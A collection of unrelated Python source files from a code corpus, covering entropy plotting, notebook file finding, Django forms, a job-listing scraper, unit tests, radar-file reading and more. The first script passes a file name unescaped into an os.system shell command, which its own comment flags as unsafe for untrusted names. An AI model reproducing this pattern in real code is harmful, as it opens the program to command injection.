        for key in sorted(symbol_dict, key=symbol_dict.__getitem__, reverse=True):
            info = information(symbol_dict.get(key), totalEvents)
            datafile.write(str(rank) + "\t" + str(key) + "\t \t" + str(info) + "\n")
            if info > highest_info:
                highest_info = info
            rank += 1
    highest_info = highest_info * 1.25  # 25% headroom on the plot's y-axis
    # NOTE(review): ``filein`` is interpolated into a shell command — only
    # safe for trusted file names.
    system('gnuplot -e "max=' + str(highest_info) + '" -e "filename=\'info' + str(ntpath.basename(filein) + '.png') + '\'" -e "maxentropy=' + str(max_entropy) + '" -e "entropy=' + str(entropy) + '" plot.gp')
    remove("data.dat")
def dump_graph(filein, symbol_nodos):
    """Render the node/edge map as a PNG via graphviz and return the graph.

    :param filein: input file name; its basename names the rendered files
    :param symbol_nodos: mapping of node name -> iterable of destination names
    """
    dot = Digraph(comment='Nodos en la red', format='png')
    for source in symbol_nodos.keys():
        dot.node(source, source)
    for source in symbol_nodos.keys():
        for dest in symbol_nodos.get(source):
            dot.edge(source, dest)
    dot.render(filename=str(ntpath.basename(filein)))
    return dot
# returns information
def information(totalSymbol, totalEvents):
    """Self-information in bits of a symbol seen totalSymbol times out of totalEvents."""
    ratio = totalSymbol / totalEvents
    return -math.log(ratio, 2)
# returns entropy
def entropy(symbol_dict, totalEvents):
    """Shannon entropy of the source described by symbol_dict, as a string."""
    acc = 0.0
    for count in symbol_dict.values():
        acc += getFrequency(count, totalEvents) * getInformation(count, totalEvents)
    return str(acc)
# max entropy
def max_entropy(symbol_dict):
    """log2 of the alphabet size — the entropy upper bound — as a string."""
    alphabet_size = len(symbol_dict.keys())
    return str(math.log(alphabet_size, 2))
# returns information rendered by a symbol from a source
def getInformation(symbolEvents, totalEvents):
    """Information in bits carried by a symbol occurring symbolEvents times
    out of totalEvents (frequency computation inlined)."""
    relative_freq = float(symbolEvents) / totalEvents
    return -1.0 * math.log(relative_freq, 2)
# returns frequency of a symbol from a source
def getFrequency(symbolEvents, totalEvents):
    """Relative frequency of a symbol (symbolEvents / totalEvents) as a float."""
    return symbolEvents / float(totalEvents)
6623007 | <gh_stars>0
# p36.py
# Input: line 1 -> n and k; line 2 -> 2*n integers; line 3 -> k query values.
str1 = input().split()
str2 = input().split()
str3 = input().split()
# Convert all tokens to ints.
str1 = list(map(int, str1))
str2 = list(map(int, str2))
str3 = list(map(int, str3))
n = str1[0]
k = str1[1]
for i in range(1, k + 1):
    if i % 2 != 0:
        # Odd query: scan even-indexed entries left-to-right and print the
        # 1-based position of the first entry >= the i-th query value.
        for j in range(0, n):
            if str2[2*j] >= str3[i-1]:
                print(2*j+1)
                break
    else:
        # Even query: scan odd-indexed entries right-to-left and print the
        # 1-based position of the first entry >= the i-th query value.
        for j in range(0, n):
            if str2[2*n-1-2*j] >= str3[i-1]:
                print(2*n-2*j)
                break
| StarcoderdataPython |
1979841 | <filename>nbassignment/utils/notebookfilefinder.py
import re
import os
class MarkdownImageFinder:
    """Extracts image paths referenced from markdown text.

    Handles three syntaxes: inline ``![alt](path)``, raw HTML ``<img src=...>``
    and reference-style ``![alt][label]`` resolved via a ``[label]: path`` line.
    """
    def __init__(self):
        self.__p_inline = re.compile(r'!\[[^\]]*\]\(([^\)]*)\)')
        self.__p_html = re.compile(r'<img[^>]*src\s*=\s*("[^"]*"|\'[^\']*\')')
        self.__p_alt = re.compile(r'!\[[^\]]*\](\[[^\)\n]*\])')

    def __find_inline_images(self, markdown):
        """Inline image paths, excluding notebook ``attachment:`` links."""
        matches = self.__p_inline.findall(markdown)
        return [m for m in matches if not m.startswith('attachment:')]

    def __find_html_images(self, markdown):
        """``src`` values of HTML <img> tags, surrounding quotes stripped."""
        return [m[1:-1] for m in self.__p_html.findall(markdown)]

    def __find_alt_images(self, markdown):
        """Resolve reference-style links by locating their ``[label]: path`` line."""
        found = []
        for link in self.__p_alt.findall(markdown):
            # Search for the line that defines this reference label
            for line in markdown.split('\n'):
                if line.strip().startswith(link) and ':' in line:
                    found.append(line.split(':')[-1].strip())
        return found

    def find_images(self, markdown):
        """All image paths found in *markdown*, in inline/html/reference order."""
        return (self.__find_inline_images(markdown)
                + self.__find_html_images(markdown)
                + self.__find_alt_images(markdown))
class CodeFileFinder:
    """Finds quoted references to a given filename inside source-code text."""

    def __init__(self):
        # building blocks for a (dir/)*filename relative-path regex
        self.__directory = r'[\w-]+'
        self.__slash = r'(/|\\)'

    def __get_pattern(self, filename):
        """Compile a regex matching a quoted relative path ending in *filename*."""
        # fix: escape the filename so regex metacharacters (e.g. the '.' in
        # "data.csv") are matched literally instead of matching any character
        return re.compile(r'["\'](({}{})*{})["\']'.format(
            self.__directory, self.__slash, re.escape(filename)
        ))

    def find_file(self, string, filename):
        """Return every quoted path in *string* whose basename is *filename*."""
        return [f[0] for f in self.__get_pattern(filename).findall(string)]
class NotebookFileFinder:
    """Locates, inside a notebook, references to a given set of files:
    markdown image links and quoted paths in code cells."""
    def __init__(self):
        self.__mdfinder = MarkdownImageFinder()
        self.__codefinder = CodeFileFinder()

    def flatten(self, iterable):
        # Flatten one level: list of lists -> single list.
        return [item for sublist in iterable for item in sublist]

    def find_files_in_notebook(self, nb, files):
        """Return the set of paths referenced in *nb* that match *files*.

        :param nb: a parsed notebook object exposing ``cells``.
        :param files: iterable of file paths whose basenames are searched for.
        """
        finds = set()

        # Split into markdown and code cells
        markdown = [cell.source for cell in nb.cells if cell.cell_type == 'markdown']
        code = [cell.source for cell in nb.cells if cell.cell_type == 'code']

        # Find images in markdown cells
        markdown_finds = self.flatten(
            [self.__mdfinder.find_images(cell) for cell in markdown]
        )

        # Find files in code cells
        code_finds = []
        for other_file in files:
            name = os.path.basename(other_file)
            code_finds.extend(self.flatten(
                [self.__codefinder.find_file(cell, name) for cell in code]
            ))
            # Markdown images are only kept when they mention one of the
            # requested basenames; with an empty *files* list none are kept.
            for find in markdown_finds:
                if name in find:
                    finds.add(find)

        code_finds = set(code_finds)

        return finds.union(code_finds)
| StarcoderdataPython |
5021354 | <reponame>waikato-datamining/wai-common
from typing import Optional, Tuple
# Single-character datatype codes used by Field definitions
DATATYPE_STRING = 'S'
DATATYPE_NUMERIC = 'N'
DATATYPE_BOOLEAN = 'B'
DATATYPE_UNKNOWN = 'U'

# Separator between parts of a compound name
SEPARATOR = '\t'
class Field:
    """
    Class representing a report field. Has a name and a datatype.
    Can be a compound name, where the prefix and suffix parts of
    the name are separated by a tab.
    """
    def __init__(self, name, datatype=DATATYPE_UNKNOWN):
        """
        :param name: the field name, possibly compound ("prefix<TAB>suffix").
        :param datatype: one of the DATATYPE_* codes; validated by __setattr__.
        """
        # Placeholders for computed properties
        self.prefix: Optional[str] = None
        self.suffix: Optional[str] = None

        self.name: str = name
        self.datatype: str = datatype

    def value_of(self, value: str):
        """
        Converts a string into a value of the correct type for
        this field.

        :param value: The string value to convert.
        :return: The typed value.
        :raises ValueError: if this field's datatype is unknown.
        """
        if self.datatype == DATATYPE_STRING:
            return fix_string(value)
        elif self.datatype == DATATYPE_BOOLEAN:
            # NOTE(review): bool() of any non-empty string is True, so e.g.
            # "false" converts to True — confirm this is intended.
            return bool(value)
        elif self.datatype == DATATYPE_NUMERIC:
            return float(value)
        else:
            raise ValueError('Cannot convert value as field type is unknown')

    def __setattr__(self, key, value):
        # Validation of datatype: reject any code outside the DATATYPE_* set
        if key == 'datatype' and not is_valid_datatype(value):
            raise ValueError('datatype must be S, N, B or U')
        super().__setattr__(key, value)

    def __getattribute__(self, item):
        # Lazy calculation of prefix/suffix: recomputed from ``name`` on every
        # access (not cached), so they always reflect the current name.
        if item == 'prefix' or item == 'suffix':
            self.prefix, self.suffix = split_name(self.name)
        return super().__getattribute__(item)
def split_name(name: str) -> Tuple[Optional[str], Optional[str]]:
    """
    Splits a compound name into its prefix and suffix parts.

    :param name: the (possibly compound) field name.
    :return: (prefix, suffix), or (None, None) if the name is not compound.
    """
    # A name without the separator is not a compound name
    if SEPARATOR not in name:
        return None, None

    # Only split on the first separator; the suffix may contain more tabs
    prefix, suffix = name.split(SEPARATOR, 1)
    return prefix, suffix
def is_valid_datatype(datatype: str) -> bool:
    """
    Checks whether the given datatype string is one of the
    recognised datatype codes.

    :param datatype: the datatype string to check.
    :return: True if the datatype string is valid, False otherwise.
    """
    valid_codes = {DATATYPE_STRING,
                   DATATYPE_NUMERIC,
                   DATATYPE_BOOLEAN,
                   DATATYPE_UNKNOWN}
    return datatype in valid_codes
def fix_string(string: str) -> str:
    """
    Replaces apostrophes with back-ticks.

    :param string: the string to fix.
    :return: the fixed string.
    """
    translation = str.maketrans("'", "`")
    return string.translate(translation)
| StarcoderdataPython |
3208586 | <filename>src/utils/parse/types.py
import typing
def try_int(s: str) -> typing.Optional[int]:
    """Parse *s* as an int, returning None when it is not a valid integer."""
    try:
        value = int(s)
    except ValueError:
        return None
    return value
| StarcoderdataPython |
8121948 | # Copyright 2021 TUNiB Inc.
class InfiniteDataLoader:
    """
    Wraps a dataloader so iteration never stops: when the underlying
    iterator is exhausted, it is transparently re-created.
    (Equivalent to ``deepspeed.runtime.dataloader.RepeatingLoader``.)
    """

    def __init__(self, loader):
        self.loader = loader
        self.data_iter = iter(self.loader)

    def __iter__(self):
        return self

    def __next__(self):
        try:
            return next(self.data_iter)
        except StopIteration:
            # wrap around: restart from the beginning of the loader
            self.data_iter = iter(self.loader)
            return next(self.data_iter)
| StarcoderdataPython |
1795344 | from django import forms
from django.forms import widgets
from order.models import BillingAddress, ShippingAddress
class ShippingAddressForm(forms.ModelForm):
    """ModelForm for collecting a customer's shipping address.

    All text inputs share the 'input-text' CSS class; the user
    selector uses the Bootstrap 'form-control' class.
    """

    class Meta:
        model = ShippingAddress
        fields = [
            'user',
            'first_name',
            'last_name',
            'address',
            'city',
            'zipcode',
            'country',
            'phone',
        ]
        # Per-field widget overrides, used only for CSS styling.
        widgets = {
            'user': widgets.Select(attrs={'class': 'form-control'}),
            'first_name': widgets.TextInput(attrs={'class': 'input-text'}),
            'last_name': widgets.TextInput(attrs={'class': 'input-text'}),
            'address': widgets.TextInput(attrs={'class': 'input-text'}),
            'city': widgets.TextInput(attrs={'class': 'input-text'}),
            'zipcode': widgets.TextInput(attrs={'class': 'input-text'}),
            'country': widgets.TextInput(attrs={'class': 'input-text'}),
            'phone': widgets.TextInput(attrs={'class': 'input-text'}),
        }
class BillingAddressForm(forms.ModelForm):
    """ModelForm for collecting a customer's billing address.

    Mirrors ShippingAddressForm field-for-field, differing only in
    the underlying model.
    """

    class Meta:
        model = BillingAddress
        fields = [
            'user',
            'first_name',
            'last_name',
            'address',
            'city',
            'zipcode',
            'country',
            'phone',]
        # Per-field widget overrides, used only for CSS styling.
        widgets = {
            'user' : widgets.Select(attrs={'class': 'form-control'}),
            'first_name': widgets.TextInput(attrs={'class': 'input-text'}),
            'last_name': widgets.TextInput(attrs={'class': 'input-text'}),
            'address': widgets.TextInput(attrs={'class': 'input-text'}),
            'city': widgets.TextInput(attrs={'class': 'input-text'}),
            'zipcode': widgets.TextInput(attrs={'class': 'input-text'}),
            'country': widgets.TextInput(attrs={'class': 'input-text'}),
            'phone': widgets.TextInput(attrs={'class': 'input-text'}),
        }
import json,re,csv;

# Commented-out one-off that wrote the CSV header row for the output file.
#open('hrmonkeys.csv','w').write('Company Name,Location,Job type,Rating,Job details(time),Job details(price),Qualifications,Closing Date,Full job description,Duties and Responsibilities,Preferred Qualifications\n');

# Base URL used to turn relative job-card hrefs into absolute links.
base_url = 'https://www.simplyhired.com'

# Accumulator for the job-detail URLs to scrape.
l = []

# Walk the paginated search results and collect every job-card link.
# NOTE(review): `fetch` and `response` are not defined in this file; the
# script appears to be written for an interactive scraping shell (e.g.
# scrapy shell / scrapely) where both are injected globals - confirm.
[(fetch('https://www.simplyhired.com/search?q=cannabis+jobs&l=Remote&job=WbE9YtfIPQX4KIkH8RuRZtHkpfzVL47bS0K09zgBEeMtMWR59fIWyw&pn='+str(i)),
  [l.append(base_url+str(r.css('a.card-link::attr(href)').get())) for r in response.css('div[class="SerpJob-jobCard card"]')]  # get the links
 ) for i in range(1,2)]  # 13 pages in the full run; limited to 1 here
# clean qualification
def clean_1(elements, pin):
    """Extract the text of one <b>-delimited section from an HTML fragment.

    The fragment is scanned for ``<tag>text`` pairs; the very first match
    is discarded, and ``<b>`` tags act as section separators:

    * ``pin == 1`` - text before the first ``<b>``
    * ``pin == 2`` - text between the first and second ``<b>``
    * ``pin == 3`` - text between the second and third ``<b>``

    :param elements: HTML fragment (or falsy for "no content").
    :param pin: Section selector (1, 2 or 3).
    :return: The concatenated text of the section with surrounding
             newlines trimmed, or "" for empty input / unknown pin.
    """
    if not elements:
        return ""
    regex = r'''(<\w+( )*>)([^<]+)'''
    li = re.findall(regex, elements)
    li.pop(0)  # drop the leading (title) match
    # Positions of the <b> separators within the remaining matches.
    indexies = [i for i, match in enumerate(li) if match[0] == '<b>']
    if pin == 1:
        section = li[:indexies[0]]
    elif pin == 2:
        section = li[indexies[0] + 1:indexies[1]]
    elif pin == 3:
        section = li[indexies[1] + 1:indexies[2]]
    else:
        # Previously this path fell through and returned None implicitly;
        # return "" so callers always get a string.
        return ""
    # Concatenate the text parts, trimming surrounding newlines.
    return ''.join(str(match[2]).strip('\n') for match in section)
# clean qualification
def clean_2(text):
    """Join the given items into one string, prefixing each with '-'."""
    return ''.join('-' + str(item) for item in text)
# NOTE(review): `my_link` is never used below - possibly a leftover from
# manual testing of a single job page.
my_link = 'https://www.simplyhired.com/job/pOCdVeLCBoccX__-X0IkNGUDtnYlsOS8rrCPC4HCN331OF1n9qP3EQ?q=cannabis+jobs'

# Crawl every collected job-detail URL and append one JSON object per job
# to gig.json. As above, `fetch` and `response` are assumed to be globals
# provided by the interactive scraping shell.
[(fetch(x),
  [open('gig.json','a').write(json.dumps({
      "Company Name" : r.css('h2[class="viewjob-jobTitle h2"]::text').get(),
      "Location" : r.css('div[class="viewjob-labelWithIcon"]::text').get(),
      "Job type" : r.css('div[class="viewjob-labelWithIcon"]::text').getall()[1],
      "Rating" : r.css('span[class="CompanyRatings-ratingDigit"]::text').get(),
      "Job details(time) " : r.css('span[class="viewjob-labelWithIcon viewjob-jobType"]> span::text').get(),
      "Job details(price) " : r.css('span[class="viewjob-labelWithIcon viewjob-salary"]::text').getall()[1] ,
      "Qualifications " : clean_2(r.css('li[class="viewjob-qualification"]::text').getall()),
      "Closing Date" :r.css('div > div:nth-child(5) > div > div.p::text').get(),
      "Full job description" : clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),1),
      "Duties and Responsibilities":clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),2),
      "Preferred Qualifications" : clean_1(r.css('div > div:nth-child(5) > div > div.p').get(),3),
  },indent=2,ensure_ascii=False)+'\n')
  for r in response.css('aside[class="rpContent ViewJob ViewJob-redesign ViewJob-v3"]') if r is not None]) for x in l ]
3341522 | import unittest
from handlers.QueryHandler import QueryHandler
from collections import namedtuple
# Lightweight stand-in for a Cassandra result row used by the tests below.
cassandraRow = namedtuple('row', ['timestamp', 'name', 'value'])

# NOTE(review): unused in this module - possibly left over from a copied
# annotations test file.
ANNOTATION_NAME = 'test annotation'
class TestAnnotationsHandler(unittest.TestCase):
    """Unit tests for QueryHandler's static parsing/aggregation helpers.

    NOTE(review): despite its name, this class tests QueryHandler, not an
    annotations handler - consider renaming for clarity.
    """

    # Shared fixture: fake Cassandra rows covering several metric names
    # and heterogeneous value types (float, int, bool, str).
    rows = [
        cassandraRow(timestamp=9876543210, name='oxygen', value=0.001),
        cassandraRow(timestamp=1256903478, name='laser', value=123),
        cassandraRow(timestamp=1000000000, name='door', value=True),
        cassandraRow(timestamp=2000000000, name='file name', value='text'),
        cassandraRow(timestamp=6000000000, name='oxygen', value=0.002),
        cassandraRow(timestamp=7000000000, name='laser', value=0),
        cassandraRow(timestamp=9000000000, name='door', value=False),
    ]

    def test_parse_results_as_timeserie(self):
        """One timeserie per distinct name; points keep order and scale."""
        results = QueryHandler._parse_results_as_timeserie(self.rows)
        names = set(line.name for line in self.rows)
        self.assertEqual(len(names), len(results), msg='Parsed results have one entry for every different name')
        for line in results:
            self.assertTrue(line['target'] in names, msg='All entries have a target from a raw result name')
            self.assertTrue(len(line['datapoints']) > 0, msg='All entries have at least one point')
            row_values = [row for row in self.rows if row.name == line['target']]
            self.assertEqual(len(row_values), len(line['datapoints']), msg='An entry have as much point as row values')
            for i in range(len(row_values)):
                raw_point = row_values[i]
                parsed_point = line['datapoints'][i]
                parsed_value, parsed_timestamp = parsed_point
                self.assertEqual(
                    raw_point.timestamp,
                    parsed_timestamp * 1000,
                    msg='Timestamp must be reduce to microsecond'
                )
                # Values are normalised to either str or float by the handler.
                if type(parsed_value) == str:
                    self.assertEqual(str(raw_point.value), parsed_value, msg='Parsed point equals str(raw value)')
                elif type(parsed_value) == float:
                    self.assertEqual(float(raw_point.value), parsed_value, msg='Parsed point equals float(raw value)')
                else:
                    self.fail('Parsed points type must be float or str')

    def test_parse_results_as_table(self):
        """Rows are rendered verbatim into Grafana's table contract."""
        results = QueryHandler._parse_results_as_table(self.rows)
        expected_result = [{
            'columns': [
                {
                    'text': 'timestamp',
                    'type': 'string'
                },
                {
                    'text': 'name',
                    'type': 'string'
                },
                {
                    'text': 'value',
                    'type': 'string'
                }
            ],
            'rows': [
                [9876543.210, 'oxygen', 0.001],
                [1256903.478, 'laser', 123],
                [1000000.000, 'door', True],
                [2000000.000, 'file name', 'text'],
                [6000000.000, 'oxygen', 0.002],
                [7000000.000, 'laser', 0],
                [9000000.000, 'door', False]
            ],
            'type': 'table'
        }]
        self.assertEqual(expected_result, results, msg='Table entries must respect the Grafana contract')

    def test_compute_aggregation(self):
        """Each aggregation keyword maps to the expected reduction;
        unknown keywords fall back to 'average'; empty input behaviour
        matches the underlying builtins (ValueError / ZeroDivisionError)."""
        some_values = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
        self.assertEqual(
            45,
            QueryHandler._compute_aggregation(some_values, 'sum'),
            msg='Sum of all the values'
        )
        self.assertEqual(
            0,
            QueryHandler._compute_aggregation(some_values, 'minimum'),
            msg='Minimum of all the values'
        )
        self.assertEqual(
            9,
            QueryHandler._compute_aggregation(some_values, 'maximum'),
            msg='Maximum of all the values'
        )
        self.assertEqual(
            False,
            QueryHandler._compute_aggregation(some_values, 'and'),
            msg='Boolean and of all the values'
        )
        self.assertEqual(
            True,
            QueryHandler._compute_aggregation(some_values, 'or'),
            msg='Boolean or of all the values'
        )
        self.assertEqual(
            10,
            QueryHandler._compute_aggregation(some_values, 'count'),
            msg='Count of all the values'
        )
        self.assertEqual(
            4.5,
            QueryHandler._compute_aggregation(some_values, 'average'),
            msg='Average of all the values'
        )
        self.assertEqual(
            4.5,
            QueryHandler._compute_aggregation(some_values, 'not existing method'),
            msg='Default is Average'
        )
        empty_values = []
        self.assertEqual(0, QueryHandler._compute_aggregation(empty_values, 'sum'), msg='Sum on empty array is 0')
        with self.assertRaises(ValueError, msg='Minimum on empty array is a ValueError'):
            QueryHandler._compute_aggregation(empty_values, 'minimum')
        with self.assertRaises(ValueError, msg='Maximum on empty array is a ValueError'):
            QueryHandler._compute_aggregation(empty_values, 'maximum')
        self.assertEqual(
            True,
            QueryHandler._compute_aggregation(empty_values, 'and'),
            msg='Boolean and on empty array is True'
        )
        self.assertEqual(
            False,
            QueryHandler._compute_aggregation(empty_values, 'or'),
            msg='Boolean or on empty array is True'
        )
        self.assertEqual(
            0,
            QueryHandler._compute_aggregation(empty_values, 'count'),
            msg='Count on empty array is 0'
        )
        with self.assertRaises(ZeroDivisionError, msg='Average on empty array is a ZeroDivisionError'):
            QueryHandler._compute_aggregation(empty_values, 'average')

    def test_aggregate_datapoint_changes(self):
        """Only datapoints whose value differs from the previous one are kept."""
        some_values = [
            [1, 1000],
            [1, 1001],
            [1, 1002],
            [2, 1003],
            [2, 1004],
            [2, 1005],
            [3, 1006],
            [3, 1007],
            [4, 1008],
            [1, 1009],
        ]
        unique_values = [
            some_values[0],
            some_values[3],
            some_values[6],
            some_values[8],
            some_values[9]
        ]
        self.assertEqual(
            unique_values,
            QueryHandler._aggregate_datapoint_changes(some_values),
            msg='Keep only entries when the value change'
        )
        empty_values = []
        self.assertEqual(
            empty_values,
            QueryHandler._aggregate_datapoint_changes(empty_values),
            msg='No entries when no values given'
        )
| StarcoderdataPython |
1682249 | <reponame>JaumVitor/HOMEWORK-PYTHON
dia = int ( input ( 'Quantos dias passou com o carro ? '))
km = float ( input ( 'Quantos km foram rodados ? '))
custo = (dia * 60) + (km * 0.15)
print ( 'Valor do aluguel é de R${}'.format(custo ))
| StarcoderdataPython |
6446331 | <gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 8 12:12:30 2020
@author: Rudra
"""
import os
import glob
import torch
path2logs = os.path.join('..', 'logs', 'ritnet')
strSys = 'RC'
cond = [0, 1, 2]
selfCorr = [0, 1]

# Output container reused across iterations: only 'state_dict' is rewritten
# each time; 'epoch' is deliberately reset to 0 in every output checkpoint.
opDict = {'state_dict':[], 'epoch': 0}

for i in cond:
    for j in selfCorr:
        # Source checkpoint: <sys>_e2e_<cond>_<selfCorr>_0
        strModel = '{}_e2e_{}_{}_0'.format(strSys, i, j)
        path2checkpoint = os.path.join(path2logs, strModel, 'checkpoints', 'checkpoint.pt')
        netDict = torch.load(path2checkpoint)
        # Some checkpoints wrap the weights in a 'state_dict' key, others are bare.
        if 'state_dict' in netDict.keys():
            stateDict = netDict['state_dict']
        else:
            stateDict = netDict
        # Drop the domain-discriminator head ('dsIdentify_lin') before re-saving.
        opDict['state_dict'] = {k: v for k, v in stateDict.items() if 'dsIdentify_lin' not in k}
        # Destination checkpoint: same name with trailing _1 instead of _0.
        strOut = '{}_e2e_{}_{}_1'.format(strSys, i, j)
        path2checkpoint_out = os.path.join(path2logs, strOut, 'checkpoints', 'checkpoint.pt')
        torch.save(opDict, path2checkpoint_out)
        print('Success. {} -> {}'.format(path2checkpoint, path2checkpoint_out))
| StarcoderdataPython |
5014488 | """
Feedback package
Takes in a message and an (optional) email address and sends feedback to
e-mail address specified in settings.py
""" | StarcoderdataPython |
6429573 | <reponame>angrybacon/gitaxian-probability<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# flake8: noqa
"""
The SLATE table contains the corresponding flags to each card that is relevant
to Lands as an archetype.
The FORMS table lists all forms for a Manabond into Marit Lage on the first
turn.
"""
# Each card maps to a tuple of flags; 'L' marks a land, single letters such
# as 'G'/'W' appear to be produced colours and '1'/'2' generic mana amounts,
# while two-letter codes ('DD', 'TS', 'MB', 'MD', 'CR', 'RP') name specific
# combo pieces referenced by FORMS below. (Flag semantics inferred from the
# module docstring - confirm against the consuming code.)
SLATE = {
    # Business
    'Crop Rotation': ('CR',),
    'Manabond': ('MB',),
    # Mana
    'Mox Diamond': ('MD',),
    # Lands
    'Ancient Tomb': ('L', '2',),
    'Blast Zone': ('L', '1',),
    'Bojuka Bog': ('L',),
    'Dark Depths': ('L', 'DD',),
    'Forest': ('L', 'G',),
    'Ghost Quarter': ('L', '1',),
    'Glacial Chasm': ('L',),
    "Hall of Heliod's Generosity": ('L', '1',),
    'Horizon Canopy': ('L', '1', 'G', 'W',),
    'Karakas': ('L', 'W',),
    'Maze of Ith': ('L',),
    'Riftstone Portal': ('L', 'RP', '1',),
    'Rishadan Port': ('L', '1',),
    'Savannah': ('L', 'G', 'W',),
    'The Tabernacle at Pendrell Vale': ('L',),
    "Thespian's Stage": ('L', 'TS', '1',),
    'Tranquil Thicket': ('L',),
    'Verdant Catacombs': ('L', 'G', 'W',),
    'Wasteland': ('L', '1',),
    'Windswept Heath': ('L', 'G', 'W',),
    'Wooded Foothills': ('L', 'G', 'W',),
}

# Hand configurations enabling a turn-one Manabond into Marit Lage.
# Each form has a 'base' of mandatory pieces plus alternative mana mixes;
# '=X' appears to mean "exactly that many of X" and 'A|B' either flag.
FORMS = {
    'No Mox Diamond, no Crop Rotation, no Ancient Tomb': [
        {'base': ((1, 'MB',), (1, 'DD',), (1, 'TS',), (0, '=MD',), (0, '=CR'), (0, '=2'))},
        ((1, '=G',), (2, '1|W',),),
        ((2, '=G',), (1, '1|W',),),
        ((3, 'G',),),
    ],
    'No Mox Diamond, no Crop Rotation, with Ancient Tomb': [
        {'base': ((1, 'MB',), (1, 'DD',), (1, 'TS',), (0, '=MD',), (0, '=CR'))},
        ((1, '2'), (1, 'G',),),
    ],
}
| StarcoderdataPython |
9052 | <filename>fastseg/model/utils.py<gh_stars>100-1000
import torch.nn as nn
from .efficientnet import EfficientNet_B4, EfficientNet_B0
from .mobilenetv3 import MobileNetV3_Large, MobileNetV3_Small
def get_trunk(trunk_name):
    """Retrieve the pretrained network trunk and channel counts.

    Returns a (backbone, s2_ch, s4_ch, high_level_ch) tuple for the
    requested trunk name; raises ValueError for an unknown name.
    """
    # trunk name -> (constructor, s2 channels, s4 channels, high-level channels)
    trunk_specs = {
        'efficientnet_b4': (EfficientNet_B4, 24, 32, 1792),
        'efficientnet_b0': (EfficientNet_B0, 16, 24, 1280),
        'mobilenetv3_large': (MobileNetV3_Large, 16, 24, 960),
        'mobilenetv3_small': (MobileNetV3_Small, 16, 16, 576),
    }
    if trunk_name not in trunk_specs:
        raise ValueError('unknown backbone {}'.format(trunk_name))
    trunk_cls, s2_ch, s4_ch, high_level_ch = trunk_specs[trunk_name]
    # Instantiate lazily so only the requested backbone is built/downloaded.
    backbone = trunk_cls(pretrained=True)
    return backbone, s2_ch, s4_ch, high_level_ch
class ConvBnRelu(nn.Module):
    """Convenience layer combining a Conv2d, BatchNorm2d, and a ReLU activation.

    Original source of this code comes from
    https://github.com/lingtengqiu/Deeperlab-pytorch/blob/master/seg_opr/seg_oprs.py
    """

    def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0,
                 norm_layer=nn.BatchNorm2d):
        super(ConvBnRelu, self).__init__()
        # Bias is omitted because the following normalisation layer has its own.
        self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
                              stride=stride, padding=padding, bias=False)
        self.bn = norm_layer(out_planes, eps=1e-5)
        self.relu = nn.ReLU(inplace=True)

    def forward(self, x):
        # conv -> norm -> relu, expressed as a single chained call.
        return self.relu(self.bn(self.conv(x)))
| StarcoderdataPython |
def func1(func2):
    """Invoke *func2* with no arguments and return whatever it returns."""
    result = func2()
    return result
def hello():
    """Return a fixed Portuguese hello-world greeting."""
    greeting = 'Olá, mundo'
    return greeting
print(func1(hello))
def func_mestre(f, *args, **kwargs):
    """Call *f*, forwarding every positional and keyword argument."""
    result = f(*args, **kwargs)
    return result
def fala_oi(nome):
    """Return the greeting 'Oi, <nome>'."""
    return 'Oi, {}'.format(nome)
def fala(saud, nome):
    """Return '<saud>, <nome>' - a greeting with a custom salutation."""
    return '{}, {}'.format(saud, nome)
# Demonstrate the forwarding wrapper with one and two arguments.
print(func_mestre(fala_oi, 'João'))
print(func_mestre(fala, 'Olá', 'João'))
19607 | <gh_stars>0
'''
Copyright (C) 2016 The Crown (i.e. Her Majesty the Queen in Right of Canada)
This file is an add-on to RAVE.
RAVE is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
RAVE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with RAVE. If not, see <http://www.gnu.org/licenses/>.
'''
##
# McGill format reader
# McGill indices are base 1, except the bin_number!
##
# @file
# @author <NAME>, Environment and Climate Change Canada
# @date 2016-01-22
import time
import _rave, _raveio
import _polarvolume, _polarscan, _polarscanparam
from Proj import dr
from numpy import *
# File-layout constants, in bytes (see the McGill volume scan format docs).
HEADER_LENGTH = 4096
RECORD_LENGTH = 2048
SEGMENT_LENGTH = 19
SEGMENTS = 107
NRAYS = 360
SCANT = 10 # Time in seconds to acquire a sweep.
# Maps McGill met_param codes to ODIM quantity names.
QUANTITIES = {1 : "DBZH", 4 : "VRADH", 16 : "ZDR", 17 : "PHIDP",
              18 : "RHOHV", 19 : "KDP"} # Only 1 and 4 are available

# esteps are the times in seconds between tilts in the ascending scan strategy
# These are real times from an acquisition in April 2012. They are used to
# adjust the timing metadata backwards, as McGill timestamps the end of data
# acquisition. They are indicative only, but the best we can do.
esteps = (0.921875, 0.914062, 0.914062, 1.04688, 0.976562, 1.00000, 0.984375,
          1.02344, 1.47656, 1.33594, 1.17188, 1.71094, 2.17188, 2.82812,
          3.12500, 3.32031, 3.71875, 3.92969, 4.44531, 4.83594, 5.13281,
          5.22656, 5.29688, 0.0) # Last value is a dummy
## Empty generic container, to be populated
# @param object
class McGill(object):
    """Empty generic container; attributes are attached dynamically by the
    reader functions below (file header fields, logical records, segments)."""

    def __init__(self):
        pass
## Is this a McGill file?
# @param string containing the input file name
# @returns True if the file is a McGill file, otherwise False
def isMcGill(filename):
    """Return True when *filename* starts with the McGill magic string.

    @param filename: string containing the input file name
    @returns True if the file is a McGill file, otherwise False
    """
    # Open in binary mode: McGill volume scans are binary files, and reading
    # them through a text-mode handle can raise UnicodeDecodeError because
    # the buffered reader decodes far more than the 6 requested characters.
    # The context manager also guarantees the handle is closed on error.
    with open(filename, 'rb') as fd:
        magic = fd.read(6)
    return magic == b"mcgill"
## Reads the contents of a McGill file, according to
# http://deneb.tor.ec.gc.ca/urpdoc/reference/science/mcgill_volume_scan.html
# Attribute naming follows this document.
# The generic container is used to represent the contents of the file as:
# mobj : top-level McGill() object
# mobj.logical_records : a list of McGill objects containing one logical record each
